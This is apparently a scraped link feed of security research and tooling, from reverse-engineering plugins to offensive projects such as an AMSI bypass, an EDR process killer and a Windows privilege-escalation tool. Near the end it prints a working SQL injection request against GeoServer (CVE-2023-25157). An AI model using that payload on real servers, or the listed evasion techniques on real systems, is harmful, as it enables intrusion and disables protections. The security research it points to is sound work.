ida-rust-untangler
An IDA plugin for demangling Rust function names
IDA kmdf
This # python plugin helps the reverser & offers some confort at the beginning of an analysis
gmsad
gmsad
manages Active Directory group Managed Service Account on Linux
Given the keytab of an account which has the ability to retrieve the secret of a gMSA, gmsad creates a keytab for the service account and renew it when necessary. It can execute an arbitrary command just after renewing the keytab.
OpenWEC
A free & open source (GPLv3) implementation of a Windows Event Collector server running on GNU/Linux & written in Rust.
Blink v1.0
Blink is a brand new unprivileged userspace virtual machine that can emulate x86-64-linux binaries on any POSIX platform.
🛠 yara-ttd
Use YARA rules on Time Traveil Debugging traces. The idea behind
yara-ttd
is to use the trace files recorded by TTD withyara
itself to defeat packers #analysis #tools #sstic #debugging #malware #software #informatique
osslsigncode
OpenSSL based Authenticode signing PE/MSI/Java CAB files
https://github.com/mtrojnar/osslsigncode
https://tij.me/blog/finding-and-utilising-leaked-code-signing-certificates/
PE with spoofed sections
An undocumented trick to embed executable code within (what appears to be) a read-only PE section. The proof-of-concepts described above involve appending the payload to the end of the NT headers, but it is also possible to embed executable code within the headers.
Nice, x86matthew. Ping @siri_urz
https://secret.club/2023/06/05/spoof-pe-sections.html
https://secret.club/assets/pe_section_spoof/pe_section_spoof.zip
Abusing Microsoft SQL via ADSI
CVE-2023-2283 PoC
Public key auth bypass in libssh
fakeAmsiDll.cpp
Simply return `S_OK / AMSI_RESULT_CLEAǸ for every command
https://gist.github.com/eversinc33/beb43d05695de77a030c97ab769682ca
🛠 nbutools
Tools for offensive security of NetBackup infrastructures
Terminator
Reproducing Spyboy technique to terminate all EDR/XDR/AVs processes
DavRelayUp
An universal no-fix local privilege escalation in domain-joined Windows workstations where LDAP signing is not enforced
PoC CVE-2023-25157 by @parzel
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=osm:osm_places&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+current_user%29+AS+INTEGER%29%29+--+%27%29+%3D+true
247365